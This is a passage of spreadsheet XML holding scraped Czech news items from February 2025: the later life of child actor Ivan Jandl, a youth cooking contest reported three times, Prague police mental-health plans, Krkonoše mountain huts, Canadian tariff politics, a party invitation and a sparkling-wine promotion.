natáčení jsem se dozvěděl úplně náhodou,“ vzpomínal později Jandl na konkurs k filmu Poznamenaní. Právě tam si získal Zinnemanna , který hledal představitele do filmu o dětech, které válka připravila o domov. Natáčení probíhalo v roce 1947 ve Švýcarsku a v troskách německých měst. „Neuměl jsem ani slovo anglicky, ale texty jsem se naučil nazpaměť,“ vyprávěl později. Jeho filmovou matku ztvárnila slavná operní pěvkyně Jarmila Novotná . „Při natáčení jsem se spřátelil s Montgomerym Cliftem , který hrál amerického vojáka. Učil mě baseball a vozil mě ve svém džípu,“ vzpomínal Jandl na natáčení. Scény byly náročné – musel hrát traumatizované dítě. „ Ivan byl neobyčejně vnímavý. Stačilo mu jednou vysvětlit, co po něm chci, a on to zahrál naprosto přirozeně,“ chválil ho režisér Zinnemann . Kompars ve filmu však tvořily skutečné děti z koncentračních táborů. „Když jsem viděl jejich pohledy, nemusel jsem nic hrát. Ten smutek byl všude kolem,“ svěřil se Jandl později v rozhovoru. Podívejte se, o čem je film Poznamenaní (zapněte si české titulky): Zdroj: Youtube Sláva a pád Po uvedení filmu přišel nečekaný úspěch. Snímek chválili kritici po celém světě. V březnu 1949 přišel telegram: „Vyhrál jsi speciální cenu Akademie za nejlepší herecký výkon.“ „Ten telegram o vítězství přišel ráno. Maminka plakala radostí, ale já už věděl, že do Ameriky mě nepustí,“ vzpomínal herec. A to se potvrdilo. Nový režim totiž značil cestu za „zbytečnou provokaci západní propagandy.“ Zlatou sošku za něj musel převzít režisér – komunisté byli neúprosní. Soška pak dorazila poštou v nenápadném balíčku. „Byla menší než normální Oscar, přizpůsobená dětským rukám. Když jsem ji rozbalil, našel jsem v krabici i Zlatý glóbus. To už jsem brečel i já,“ přiznal v jednom z mála rozhovorů. Související články V tomto filmu z roku 1973 hrálo mnoho dětských herců. Z většiny jsou české superhvězdy. Poznáte Ho? Jandlovi do stále více izolovaného Československa přesto chodily obdivné dopisy. Mezi nimi i od mladičké Brigitte Bardotové , která mu líčila, jak se těší do Afriky na společné filmování snímku o dvou dětech, trosečnících, jež s ní a s Jandlem plánovala natočit společnost Europe Film . Ale režim opět rozhodl jinak – Ivan bude „zachován pro potřeby československého filmu.“ Život v ústraní Po několika epizodních rolích v českých filmech se pokoušel dostat na DAMU . „Dvakrát mě nepřijali. Vadil jim můj plešatějící vzhled a hlavně ta americká cena,“ svěřoval se přátelům. Vystřídal řadu zaměstnání – byl úředníkem, průvodčím autobusu, telefonním technikem. V rozhlase našel útočiště jako hlasatel, ale i odtud musel v roce 1972 z politických důvodů odejít. „Víte, co je nejhorší? Když vám v deseti letech řeknou, že jste génius, a pak vás donutí být průměrným,“ svěřil se krátce před smrtí přátelům v divadle Gong, kde režíroval amatérská představení. Jeho kolega z divadla vzpomínal: „Když měl dobrou náladu, vyprávěl historky z natáčení. O tom, jak mu Montgomery Clift daroval baseballovou rukavici, nebo jak mu Jarmila Novotná zpívala árie mezi záběry. Ale čím byl starší, tím víc v něm rostla hořkost.“ „Nikdy se neoženil, žil sám se svými vzpomínkami a Oscarem,“ říká jeho poslední spolupracovnice z rozhlasu. „Když jsem ho potkala naposledy, svěřil se mi: 'Víte, někdy si říkám, že by bylo lepší tu cenu nikdy nedostat. Aspoň bych nemusel celý život žít s pocitem, že jsem mohl dokázat víc.’“ Hořký konec Poslední roky trávil sám ve svém bytě v pražské Libni . Trápila ho cukrovka, ale dietu nedodržoval. „Své splíny řešil alkoholem ,“ vzpomínali známí. „Cítil se zneuznaný a měl pocit, že život promarnil.“ Zemřel osamělý při diabetickém záchvatu 21. listopadu 1987. Bylo mu pouhých 50 let. Jeho urna byla nejprve uložena na Olšanech , v roce 2017 ji Herecká asociace přenesla na Vyšehrad . Dnes jeho jméno připomíná hvězda na zlínském chodníku slávy, pamětní deska v divadle Gong a planetka číslo 37 736, která nese jméno Jandl . První český držitel Oscara si zaslouží, aby se na něj nezapomnělo.</t>
  </si>
  <si>
    <t>496730</t>
  </si>
  <si>
    <t>20250201_124_3889859327_91075f54a69df32a394f.html</t>
  </si>
  <si>
    <t>91075f54a69df32a394f</t>
  </si>
  <si>
    <t>Kuchařský titul BernardChef putuje do Karviné</t>
  </si>
  <si>
    <t>Kuchařský titul BernardChef putuje do Karviné Titul BernardChef 2025 pro mladé talentované kuchaře získala Natálie Rohalová ze SŠ Dakol v Petrovicích u Karviné . Vítězové 1. února 2025 - 11:00 O vítězce rozhodovala porota profesionálů z oblasti gastronomie v čele s šéfkuchařem renomované jihlavské restaurace Tři Knížata Pavlem Marešem . Finále soutěže se odehrálo v Návštěvnickém centru Rodinného pivovaru Bernard v Humpolci . Mladí kuchaři měli za úkol v časovém limitu dvou hodin připravit předkrm a hlavní chod, přičemž dopředu znali jen část surovin. Pro tentokrát to bylo kachní prso, uzený losos a pastinák, na místě pak měli spotřební koš, ze kterého si museli na místě vybrat a rozhodnout, co uvaří. Natálie Rohalová připravila jako předkrm lososový tatarák s kapary, šalotkou a asijským dresinkem na máslovém toastu, jako hlavní chod porotě předložila kachní prso s pastinákovým pyré na pomerančové omáčce s nakládaným zeleným pepřem. Druhé místo do Žďáru , třetí do Frenštátu O titul BernradChef bojovali čtyři finalisté, kteří se do nejužšího výběru se probojovali z několika desítek přihlášených účastníků. Druhé místo získala Natálie Heralová ze SŠ gastronomické A. Kolpinga ve Žďáru nad Sázavou , bronz si odvezl do Frenštátu pod Radhoštěm student tamní hotelové školy Matyas Vrečka. Soutěž jako podpora gastronomie Rodinný pivovar Bernard chce pořádáním soutěže podpořit obor, který v posledních letech trpí odlivem personálu do jiných oborů. „Poptávka po kvalitní gastronomii roste a dobře připravený kuchař je pro restauraci pokladem,“ popsal motivy pro uspořádání soutěže spolumajitel pivovaru Stanislav Bernard . Finalisté si vysoutěžili špičkové kuchyňské nože značky Dick, pivo na rok zdarma, certifikáty o účasti v soutěži a nabídku stáže ve stylové Pivnici Na Štokách. V čele poroty zkušený profesionál Předsedou poroty byl Pavel Mareš , majitel a šéfkuchař renomované jihlavské restaurací Tři Knížata, jeho zástupcem byl Michal Koreš, šéfkuchař Pivnice Na Štokách, dále majitelka gastronomického centra Gurmandie a manažer Návštěvnického centra Bernard Tomáš Lavický. Soutěž BernardChef je určena studentům posledních ročníků středních škol a učilišť, které vyučují gastronomické obory, hlásit se mohli i talentovaní amatéři. Finále se odehrálo ve Sládkově sále Návštěvnického centra Bernard v Humpolci . NovinkyVysočina.cz informoval Radek Tulis , tiskový mluvčí, Rodinný pivovar BERNARD a.s. (rp,novinkyvysocina.cz,foto:Rodinný pivovar BERNARD)</t>
  </si>
  <si>
    <t>20250201_125_3890782455_375e73763c1ee387f819.html</t>
  </si>
  <si>
    <t>375e73763c1ee387f819</t>
  </si>
  <si>
    <t>První zprávy - Kuchařský titul BernardChef putuje do Karviné</t>
  </si>
  <si>
    <t>První zprávy - Kuchařský titul BernardChef putuje do Karviné Velikost textu: Kuchařský titul BernardChef putuje do Karviné Titul BernardChef 2025 pro mladé talentované kuchaře získala Natálie Rohalová ze SŠ Dakol v Petrovicích u Karviné . Vítězové 1. února 2025 - 11:00 O vítězce rozhodovala porota profesionálů z oblasti gastronomie v čele s šéfkuchařem renomované jihlavské restaurace Tři Knížata Pavlem Marešem . Finále soutěže se odehrálo v Návštěvnickém centru Rodinného pivovaru Bernard v Humpolci . Mladí kuchaři měli za úkol v časovém limitu dvou hodin připravit předkrm a hlavní chod, přičemž dopředu znali jen část surovin. Pro tentokrát to bylo kachní prso, uzený losos a pastinák, na místě pak měli spotřební koš, ze kterého si museli na místě vybrat a rozhodnout, co uvaří. Natálie Rohalová připravila jako předkrm lososový tatarák s kapary, šalotkou a asijským dresinkem na máslovém toastu, jako hlavní chod porotě předložila kachní prso s pastinákovým pyré na pomerančové omáčce s nakládaným zeleným pepřem. Druhé místo do Žďáru , třetí do Frenštátu O titul BernradChef bojovali čtyři finalisté, kteří se do nejužšího výběru se probojovali z několika desítek přihlášených účastníků. Druhé místo získala Natálie Heralová ze SŠ gastronomické A. Kolpinga ve Žďáru nad Sázavou , bronz si odvezl do Frenštátu pod Radhoštěm student tamní hotelové školy Matyas Vrečka. Soutěž jako podpora gastronomie Rodinný pivovar Bernard chce pořádáním soutěže podpořit obor, který v posledních letech trpí odlivem personálu do jiných oborů. „Poptávka po kvalitní gastronomii roste a dobře připravený kuchař je pro restauraci pokladem,“ popsal motivy pro uspořádání soutěže spolumajitel pivovaru Stanislav Bernard . Finalisté si vysoutěžili špičkové kuchyňské nože značky Dick, pivo na rok zdarma, certifikáty o účasti v soutěži a nabídku stáže ve stylové Pivnici Na Štokách. V čele poroty zkušený profesionál Předsedou poroty byl Pavel Mareš , majitel a šéfkuchař renomované jihlavské restaurací Tři Knížata, jeho zástupcem byl Michal Koreš, šéfkuchař Pivnice Na Štokách, dále majitelka gastronomického centra Gurmandie a manažer Návštěvnického centra Bernard Tomáš Lavický. Soutěž BernardChef je určena studentům posledních ročníků středních škol a učilišť, které vyučují gastronomické obory, hlásit se mohli i talentovaní amatéři. Finále se odehrálo ve Sládkově sále Návštěvnického centra Bernard v Humpolci . NovinkyVysočina.cz informoval Radek Tulis , tiskový mluvčí, Rodinný pivovar BERNARD a.s. (rp,novinkyvysocina.cz,foto:Rodinný pivovar BERNARD)</t>
  </si>
  <si>
    <t>20250201_126_3889845697_59306defc9a184394984.html</t>
  </si>
  <si>
    <t>59306defc9a184394984</t>
  </si>
  <si>
    <t>Pražská městská policie posílí péči o psychické zdraví strážníků</t>
  </si>
  <si>
    <t>Pražská městská policie posílí péči o psychické zdraví strážníků Domácí 1. 2. 2025 11:00 Strážníci jsou podle ředitele pražské městské policie (MPP) Ludvíka Klemy vystavováni traumatizujícím zážitkům. Chce proto zlepšit péči o jejich psychické zdraví. Plánuje vytvořit systém, který by kombinoval pravidelná školení a individuální konzultace. Klema to řekl v rozhovoru s ČTK . Demotivující je podle něj i špatná vymahatelnost práva na ulicích. Podporuje proto změnu příslušných zákonů. Část strážníků podle Klemy odchází ze služby, protože nevydrží extrémní psychický nápor, který na ně práce klade. "Nechat si každý den nadávat od lidí, nevydrží každý. Společnost dospěla k tomu, že si běžní lidé vybíjejí frustraci na strážnících. Navíc strážníci v Praze bývají často první u různých nehod a neštěstí," vyjmenoval příčiny Klema. Psychology zaměstnává MPP už nyní, podle Klemy jich ale není dost. Chtěl by proto najmout více odborníků a zavést pravidelné povinné kurzy. "Jako mají povinně dopravní výchovu, zdravovědu, střelby, tak bude psychologická pomoc. V minulosti jsme udělali pilotní program různých on-line kurzů, ale odezva nebyla taková, jakou jsem čekal," přiznal Klema. Doplnil, že součástí projektu by měla být možnost kdykoliv požádat o individuální konzultaci. Dalším důvodem, který podle ředitele MPP přispívá k frustraci strážníků, je špatná vymahatelnost práva. Pokud lidé na místě nesouhlasí s tím, že se dopustili přestupku, přejde případ do správního řízení. To se velmi často protáhne a případný postih přijde za řadu měsíců. Vznikla proto skupina, která připravuje podklady pro změnu legislativy. "Chceme zefektivnit práci strážníků na ulici," zmínil Klema. Další podrobnosti zatím nechce prozradit, protože návrhy ještě nejsou hotové. V rozhovoru také řekl, že strážníci narážejí na problém s cizinci, kteří často opakují stejné přestupky, například řízení pod vlivem alkoholu . "Je to taková beznaděj policistů. Oni někoho chytí a další den ho chytí znovu," pronesl šéf MPP. V případě Ukrajinců je podle Klemy problém obtížně řešitelný kvůli válce. Autor: ČTK pixabay.com Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>355</t>
  </si>
  <si>
    <t>20250201_127_3889876777_a6af5ed833059262119b.html</t>
  </si>
  <si>
    <t>a6af5ed833059262119b</t>
  </si>
  <si>
    <t>Kuchařský titul BernardChef putuje do Karviné regiony Titul BernardChef 2025 pro mladé talentované kuchaře získala Natálie Rohalová ze SŠ Dakol v Petrovicích u Karviné . Vítězové 1. února 2025 - 11:00 O vítězce rozhodovala porota profesionálů z oblasti gastronomie v čele s šéfkuchařem renomované jihlavské restaurace Tři Knížata Pavlem Marešem . Finále soutěže se odehrálo v Návštěvnickém centru Rodinného pivovaru Bernard v Humpolci . Mladí kuchaři měli za úkol v časovém limitu dvou hodin připravit předkrm a hlavní chod, přičemž dopředu znali jen část surovin. Pro tentokrát to bylo kachní prso, uzený losos a pastinák, na místě pak měli spotřební koš, ze kterého si museli na místě vybrat a rozhodnout, co uvaří. Natálie Rohalová připravila jako předkrm lososový tatarák s kapary, šalotkou a asijským dresinkem na máslovém toastu, jako hlavní chod porotě předložila kachní prso s pastinákovým pyré na pomerančové omáčce s nakládaným zeleným pepřem. Druhé místo do Žďáru , třetí do Frenštátu O titul BernradChef bojovali čtyři finalisté, kteří se do nejužšího výběru se probojovali z několika desítek přihlášených účastníků. Druhé místo získala Natálie Heralová ze SŠ gastronomické A. Kolpinga ve Žďáru nad Sázavou , bronz si odvezl do Frenštátu pod Radhoštěm student tamní hotelové školy Matyas Vrečka. Soutěž jako podpora gastronomie Rodinný pivovar Bernard chce pořádáním soutěže podpořit obor, který v posledních letech trpí odlivem personálu do jiných oborů. „Poptávka po kvalitní gastronomii roste a dobře připravený kuchař je pro restauraci pokladem,“ popsal motivy pro uspořádání soutěže spolumajitel pivovaru Stanislav Bernard . Finalisté si vysoutěžili špičkové kuchyňské nože značky Dick, pivo na rok zdarma, certifikáty o účasti v soutěži a nabídku stáže ve stylové Pivnici Na Štokách. V čele poroty zkušený profesionál Předsedou poroty byl Pavel Mareš , majitel a šéfkuchař renomované jihlavské restaurací Tři Knížata, jeho zástupcem byl Michal Koreš, šéfkuchař Pivnice Na Štokách, dále majitelka gastronomického centra Gurmandie a manažer Návštěvnického centra Bernard Tomáš Lavický. Soutěž BernardChef je určena studentům posledních ročníků středních škol a učilišť, které vyučují gastronomické obory, hlásit se mohli i talentovaní amatéři. Finále se odehrálo ve Sládkově sále Návštěvnického centra Bernard v Humpolci . NovinkyVysočina.cz informoval Radek Tulis , tiskový mluvčí, Rodinný pivovar BERNARD a.s. (rp,novinkyvysocina.cz,foto:Rodinný pivovar BERNARD)</t>
  </si>
  <si>
    <t>21000</t>
  </si>
  <si>
    <t>20250201_128_3889844961_195b9f11adedb372cc4d.html</t>
  </si>
  <si>
    <t>195b9f11adedb372cc4d</t>
  </si>
  <si>
    <t>Tady je Krakonošovo. Znáte všech 10&amp;nbsp;legendárních horských bud v&amp;nbsp;Krkonoších?</t>
  </si>
  <si>
    <t>Tady je Krakonošovo. Znáte všech 10&amp;nbsp;legendárních horských bud v&amp;nbsp; Krkonoších ? Luční bouda stojí na dohled od nejvyšší české hory Sněžky . Krkonoše jsou rájem pro milovníky hor, pěší turistiky, cyklistiky i zimních sportů. Ať už sem zavítáte v létě nebo v zimě na lyže, vždy oceníte útulné horské chaty a boudy s jedinečnou atmosférou a občerstvením. Článek si také můžete poslechnout v audioverzi. Mnohé horské chaty mají dlouhou historii, spojují tradiční horskou pohostinnost s moderním komfortem. Jsou ideálním místem k odpočinku po náročném dni na krkonošských hřebenech. K některým se snadno dostanete po turistických cestách, jiné leží v odlehlejších koutech Krkonoš a jsou odměnou pro opravdové dobrodruhy. Seznam Zprávy vybraly deset nejproslulejších horských chat a bud v Krkonoších , které stojí za návštěvu. Ať už hledáte romantické útočiště s praskajícím krbem, rodinné prostředí s domácí kuchyní nebo strategické místo k přenocování při přechodu hor. 1. Luční bouda Luční bouda stojí na dohled od Sněžky . Luční bouda je nejstarší a kapacitně největší horskou chatou v Krkonoších . Základní kámen s letopočtem 1623 tu nalezli při rekonstrukci v druhé polovině 19. století. Přístřeší zde tak kolemjdoucí v nadmořské výšce 1410 metrů nacházejí po 400 let. Během své historie prošla Luční bouda mnoha úpravami. Za druhé světové války sloužila Němcům a po konfiskaci majetku se v její správě vystřídalo několik organizací. Současný majitel je tu od roku 2004 a snaží se vrátit tento horský skvost milovníkům a obdivovatelům hor. Jsou zde rekonstruované hotelové pokoje, jež pojmou až 150 hostů, naleznete zde wellness a možnosti sportovního vyžití, pro milovníky piva je v boudě i restaurace a pivovar Paroháč. 2. Vosecká bouda Vosecká bouda leží v západní části Krkonoš . Vosecká bouda získala pojmenování podle louky, na které stojí. Nachází se v nadmořské výšce 1260 metrů. Její historie sahá do roku 1743, kdy byla založena. Nejprve sloužila jako seník a koncem 18. století jako přístřešek pro dřevaře nebo hospodářské stavení. Magazín Seznam Zpráv Cestování | Jídlo | Životní styl | Architektura | Historie Láska z jáchymovských dolů. Jak se dívka zamilovala do politického vězně Stárnutí nezastavíme, ale můžeme ho zpomalit. Odborník radí, jak Panák bez alkoholu ? V barech sílí trend nealko drinků Čech zachránil Arcimbolda a odhalil falešného Rembrandta Víkend v Tallinnu : proč stojí estonská metropole u Baltu za návštěvu Od roku 1896 má využití pro turistické účely. Během let prošla několika úpravami a nynější podobu získala rekonstrukcí po konci druhé světové války. Zajímavostí je, že bouda není napojena na elektrickou síť, energii si tu vyrábějí dieselagregátem. K ubytování lze využít 43 míst v pokojích se dvěma až pěti lůžky nebo v jednom velkém, dvanáctilůžkovém pokoji. 3. Chata Výrovka Chata Výrovka zaujme na první pohled i svým unikátním vzhledem. Historie jedné z nejvýše položených chat v českých zemích, v nadmořské výšce okolo 1400 metrů, sahá do 18. století. Původní jednoduché prodejní přístřeší rodiny Steinerů bylo zbouráno začátkem 19. století. Ovšem místo bylo stále velmi vyhledávané, tak tu znovu vyrostl nejprve plátěný a později kamenný přístřešek s občerstvením a suvenýry. Dalších přestaveb se místo dočkalo ve 20. století. Vystavěná roubená bouda sloužila například jako vojenská výcviková základna nebo četnická stanice. Současná bouda vznikla mezi lety 1988 až 1990. Dnes slouží turistům a kolemjdoucím, kteří se mohou ubytovat v pokojích nebo ve společné noclehárně a najíst se v místní restauraci. 4. Labská bouda Z vrchního patra Labské boudy je krásný výhled do krkonošského údolí. Labská bouda začínala údajně v roce 1830 jako malá budka z kamení, kůry a roští, v níž se prodával kozí sýr, mléko a kořalka . Následující majitelé místo rozšířili, aby mohla bouda sloužit i k ubytování návštěvníků. Začátkem 20. století se stala velmi oblíbenou destinací, kam turisté vyráželi i za místními pochutinami. V roce 1965 budova vyhořela a na stejném místě byla roku 1975 slavnostně otevřena nová. Působivá devítipatrová železobetonová budova od architekta Zdeňka Řiháka je umístěna na hraně svahu a nabízí necelých 80 pokojů a dvě restaurace. Nachází se nedaleko pramene Labe a je tak oblíbenou zastávkou turistů, kteří k němu míří. V sousedství se nachází Labský vodopád. 5. Vrbatova bouda V zimě bývá Vrbatova bouda domovem mnoha lyžařů. Vrbatovu boudu, otevřenou v roce 1964, naleznete na Zlatém návrší v nadmořské výšce 1400 metrů. Nese jméno Václava Vrbaty , jenž tragicky zahynul v průběhu mezinárodního lyžařského závodu na 50 kilometrů společně se svým přítelem Bohumilem Hančem , kterému se vydal na pomoc. Byl nalezen umrzlý na blízkém vrcholku, jemuž se říká Vrbatovo návrší a později na něm vzrostla i kamenná mohyla Hanče a Vrbaty . Na Vrbatově boudě není možné se ubytovat, slouží hlavně jako občerstvovací stanice pro procházející turisty. Lze tu také zakoupit upomínkové předměty či suvenýry, včetně turistických známek. 6. Rýchorská bouda Rýchorská bouda je ideálním výchozím bodem pro pěší turistiku. Na vrcholku Kutná stojí na hřebeni Rýchor v nadmořské výšce jednoho kilometru od roku 1926 Rýchorská bouda. Nachází se nedaleko přírodní rezervace Dvorský les a příroda je v okolí boudy skoro nedotčena lidmi. Spatříte tu nejeden vzácný rostlinný či živočišný druh, ať už jsou to orchideje a hořce na květnatých loukách nebo skotský náhorní skot na rýchorských pastvinách. V teplejších měsících je bouda skvělým výchozím bodem pro pěší turistiku a na své si tu přijdou i cyklisté. Nedaleko například prochází Cesta bratří Čapků a mnoho dalších dobře značených tras. Naopak v zimě potěší Rýchory běžkaře, kteří se mohou prohánět po upravených trasách v okolí. 7. Bouda Jelenka Ubytovat se můžete s vlastním spacákem nebo s povlečením a polopenzí. Na východním úbočí Svorové hory se nachází na hranicích s Polskem turistická bouda Jelenka. Původně lovecká chata stojí v nadmořské výšce 1260 metrů od roku 1936 a postavit ji nechal Jaromír Černín -Morzin. Turisté se tu mohou ubytovat nebo občerstvit v přízemní restauraci po celý rok. Okolí boudy je velmi poklidné a rušit vás nebude ani zvuk projíždějících automobilů. Ty tu nemohou parkovat a k malebné boudě je potřeba dojít pěšky. Jedna z nejvýše položených turistických chat v Krkonoších stojí na křižovatce turistických cest mezi Pomezními boudami a Sněžkou a na zmíněnou nejvyšší horu u nás dojdete zhruba po 3,5 kilometrech. Několik desítek metrů nad Jelenkou se nachází Emmin pramen pojmenovaný po babičce původního majitele, jejíž jméno chvíli nesla i dnešní Jelenka. 8. Pomezní bouda V zimě není na Pomezní boudě nouze o dostatek sněhu. Historie budovy, která stojí v nadmořské výšce 1050 metrů v Horní Malé Úpě na hranici s Polskem , sahá do druhé poloviny 18. století, kdy se tu provozovala hospoda. Novému majiteli poté chalupa v roce 1860 vyhořela a byla postavena nová. Ta už tu zůstala téměř nezměněná dodnes. Chvíli se dům jmenoval Dověsil, v roce 1989 se mu díky privatizaci vrátil starý název Pomezní bouda. Díky svému umístění je ideálním výchozím bodem pro hřebenové túry, nachází se tu i dobře značené turistické nebo cyklistické trasy. Klidná okolní příroda láká ke klidné rodinné dovolené, uspořádání školení, oslavy nebo i svatby. V zimě se můžete po lyžování na sjezdovce za domem ohřát a zregenerovat v sauně nebo doplnit síly v restauraci. 9. Martinova bouda Výhled na Martinovu boudu. Na jižním svahu Vysokého kola stojí Martinova bouda. Patří mezi ty nejstarší v Krkonoších , založena byla v roce 1642. V nadmořské výšce okolo 1250 metrů tehdy chránila uprchlíky před nebezpečím třicetileté války, kteří se schovávali právě v horách. Své jméno získala po Martinovi Erlebachovi, jenž tu v roce 1795 boudu obnovil. Během let se zde vystřídala řada majitelů a pozemek s objekty dostály několika změn. Dnes tu stojí ubytovací zařízení s více než 40 lůžky, restaurací nebo saunou. Nachází se na jedné z hlavních křižovatek turisticky značených tras, z níž je možné se vydat na několikahodinové či celodenní výlety. Vyrazit lze například k nedalekému prameni Labe nebo si užít celodenní výlet na 16 kilometrů vzdálenou nejvyšší českou horu Sněžku. 10. Horská bouda Dvoračky Původní horská bouda Dvoračky podlehla dřevomorce, na jejím místě má být v roce 2025 otevřena nová. Historie Dvoraček sahá do roku 1707, kdy tu byla rodinou Schierovou vybudována zemědělská usedlost pro chov dobytka na okolních rozlehlých lučinách. Na počátku roku 1893 postihl budovu požár, jenž stavbu srovnal se zemí. Pozemek získal hrabě Harrach a vybudoval na něm hostinec, který se stal velmi oblíbeným - v únoru 1902 se zde například konalo sedmé mistrovství Čech v lyžování. Mezi vzácné hosty se zde zapsal například prezident Edvard Beneš , který tu trávil dovolenou se svou ženou, protože oba milovali Krkonoše . Místo posléze několikrát změnilo majitele, tím současným je rodina Starých. Její členové při menších stavebních úpravách zjistili, že objekt je narušen dřevomorkou a boudu museli nechat zbourat. Na stejném půdorysu pak postavili téměř identickou novou boudu, plánované dokončení je na jaře či v létě roku 2025. Otevřen je zatím vedle stojící Horský hotel Štumpovka , pojmenovaný po jednom z bývalých majitelů. AKTUALIZACE: V článku jsme nesprávně uvedli, že některé z výše uvedených chat se nachází v první zóně Krkonošského národního parku . Od roku 2020 je nové vymezení zón ochrany přírody Krkonošského národního parku . Mapa zmíněných horských chat v Krkonoších Chybí ve výběru nějaká vaše oblíbená horská bouda či chata v Krkonoších ? Dejte nám o ní vědět do komentářů.</t>
  </si>
  <si>
    <t>20250201_129_3889868804_9a0e3dae2cb9af2f7024.html</t>
  </si>
  <si>
    <t>9a0e3dae2cb9af2f7024</t>
  </si>
  <si>
    <t>Kandidátka na kanadskou premiérku: Uvalme cla na elektromobily Tesla</t>
  </si>
  <si>
    <t>Kandidátka na kanadskou premiérku: Uvalme cla na elektromobily Tesla Jak reagovat na případná americká cla? Chrystia Freelandová, kandidátka vládních liberálů na kanadskou premiérku v nadcházejících volbách, má jasno. Kanada by podle ní měla zavést obrovské dovozní poplatky na elektromobily Tesla . Informoval o tom server listu Financial Times (FT). Ottawa by tak podle ní potrestala šéfa Tesly Elona Muska, kterého označila za „miliardářského kamarádíčka“ amerického prezidenta Donalda Trumpa . Musk, který je nejbohatším člověkem světa, nyní v USA vede nový úřad pro efektivitu státní správy (DOGE). Trump podle mluvčí Bílého domu dnes uvalí 25procentní cla na dovoz z Kanady a Mexika a desetiprocentní clo na dovoz z Číny . Cla jsou podle mluvčí prezidentovy administrativy reakcí na to, že se přes Kanadu a Mexiko do USA dostává droga fentanyl. „Kanada musí pohrozit uvalením stoprocentního cla na všechna vozidla Tesla a stoprocentního cla na americké víno , pivo a lihoviny, pokud budou na Kanaďany uvalena nespravedlivá cla,“ řekla v pátek Freelandová. Cla přicházejí, pykat bude i Evropa , řekl Trump . Kanada zkoumá, jak se pomstít Komentáře „jedné z nejvýznamnějších kanadských političek“ podle FT ukazují na prudkou eskalaci obchodního sporu s Washingtonem . Kanadský premiér Justin Trudeau v pátek prohlásil, že jeho země je připravena reagovat, pokud Trump cla zavede. Dodal, že reakce bude rázná, ale rozumná. Varoval, že cla budou mít negativní dopady na Američany, protože ohrozí pracovní místa a způsobí růst cen. Trump hrozil zaváděním cel už v předvolební kampani, mimo jiné i kvůli migrantům bez dokladů, kteří se do USA dostávají zejména přes jižní hranici. Řada ekonomů varovala, že nová cla povedou k růstu inflace v USA . Vládní Liberální strana, z níž pochází Trudeau i Freelandová, aktuálně v průzkumech veřejného mínění výrazně zaostává za konzervativci a očekává se, že po volbách, které se mají uskutečnit nejpozději v říjnu, půjde do opozice. Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>75820</t>
  </si>
  <si>
    <t>20250201_13_3892163966_af5fd7669cd22f2ce147.html</t>
  </si>
  <si>
    <t>af5fd7669cd22f2ce147</t>
  </si>
  <si>
    <t>Masopoost 2025: Přijďte oslavit jaro v rytmu hudby, umění a radosti!</t>
  </si>
  <si>
    <t>Masopoost 2025: Přijďte oslavit jaro v rytmu hudby, umění a radosti! Pozvánky Nemůžete se dočkat jara? Přijďte ho přivítat ojedinělým zážitkem a protančeným večerem i nocí v opojném víru hudby, designu, umění a emocí. To vše na unikátní akci Ploom ve spolupráci s Nebál kolektivem nazvané Masopoost 2025. Party plná svěží energie, radosti, rozpuku i niternosti se bude konat 8. března v Holešovické tržnici a představí na dvou stagích interprety jako Bert &amp;amp; Friends, drag queen Miss Petty, berlínskou DJ Perel nebo duo Bratry. A to není vše, někteří umělci budou velkým překvapením. U stolu hojnosti pak můžete ochutnat speciality inspirované tradiční masopustní hostinou v moderním twistu i signature drinky od Lidí z baru, pivo z Plzně a víno z Moravy . Akce se bude konat také na podporu mladých uměleckých talentů ve spolupráci s Czech Design Week , kterým poputuje celý výtěžek. Kdy: sobota 8. března 2025 Kde: Holešovická tržnice – Hala 13 &amp;amp; 17, Bubenské nábř. 306/13, Praha V kolik: 19:00 - 3:00 Vstupné: 321 Kč (lze zakoupit https://goout.net/cs/masopoost-2025/szxsbqx/ ) Více informací: www.masopoost.cz Autor: 01.02.2025 || 01.02.2025 | Pozvánky</t>
  </si>
  <si>
    <t>20250201_130_3889809473_354fad1ad723f73f41f6.html</t>
  </si>
  <si>
    <t>354fad1ad723f73f41f6</t>
  </si>
  <si>
    <t>Valentýnská romantika na vlně bublinek</t>
  </si>
  <si>
    <t>Valentýnská romantika na vlně bublinek 01.02.2025 Gurmán Valentýn je dnem, kdy oslavujeme lásku ve všech jejích podobách. Ukažte své drahé polovičce, jak vám na ní záleží. Vyznání lásky se neskrývá ve velkých okázalých gestech, ale v maličkostech, které druhému napoví, co pro nás znamená. A co by mohlo být lepšího než společný večer s dobrým jídlem, romantickou atmosférou a lahví sektu? Bohemia Sekt vám pomůže vytvořit okamžiky, na které budete s láskou vzpomínat. Téměř neodmyslitelnou součástí romantických schůzek jsou květiny. Skvěle navodí atmosféru i beze slov. Jděte na to letos trochu jinak. Bohemia Sekt La Fleur je originální sekt, kterým vyjádříte vše. Jeho intenzivní aroma připomíná rozkvetlé růže a muškáty s tóny exotického ovoce. Lahodná plná chuť s ovocně kořenitým závěrem navíc posune chuťový zážitek o úroveň výš, kde ho ještě umocníte vlastním ručně psaným vyznáním přímo na lahev. www. osobnivinoteka.cz, 149 Kč Valentýnská večeře je klasikou, která nikdy nezklame. Jedinečnost chvíle skvěle podtrhne Bohemia Sekt Prestige rosé, připravovaný tradiční metodou kvašením v lahvi. Jeho svěží a lehká chuť v kombinaci s ovocnou vůní jahod a malin je pro romantický večer přímo dokonalá. Tento výjimečný sekt pochází z modrých hroznů odrůd Rulandské modré, Frankovka a Zweigeltrebe z vybraných moravských vinic a posbíral mnohá ocenění na prestižních výstavách po celém světě. S kým jiným si jej tedy vychutnat, než s tím nejdražším člověkem na světě! www.osobnivinoteka.cz, 229 Kč Po večeři si určitě zasloužíte sladkou tečku. Pokud chcete opravdu zapůsobit, doprovoďte dezert skleničkou růžových bublinek. Ty navodí něžnou atmosféru, která přímo vybízí k romantickým vyznáním. Svůdný Bohemia Sekt rosé demi sec okouzlí svěží ovocnou chutí a tóny malin. www.osobnivinoteka.cz, 149 Kč Od romantiky je to pak jen kousek k vášni. Nechte se unášet touhou a odhoďte zábrany. A protože je barvou smyslnosti červená, zažehněte vášeň vychlazeným červeným Bohemia Sektem, v jehož vůni se snoubí peckové ovoce a tóny čokolády. Podlehněte touze a užijte si dokonalý večer. www. osobnivinoteka.cz, 149 Kč Pokud se vyhýbáte alkoholu nebo si jen chcete tento speciální den užít s čistou hlavou, potěší vás nealkoholická varianta Bohemia Sektu rosé se svěží ovocnou chutí s převažujícími tóny malin. Díky ní si užijete perfektní večer, aniž byste přišli o opojnou chuť kvalitních bublinek. www.osobnivinoteka.cz, 149 Kč</t>
  </si>
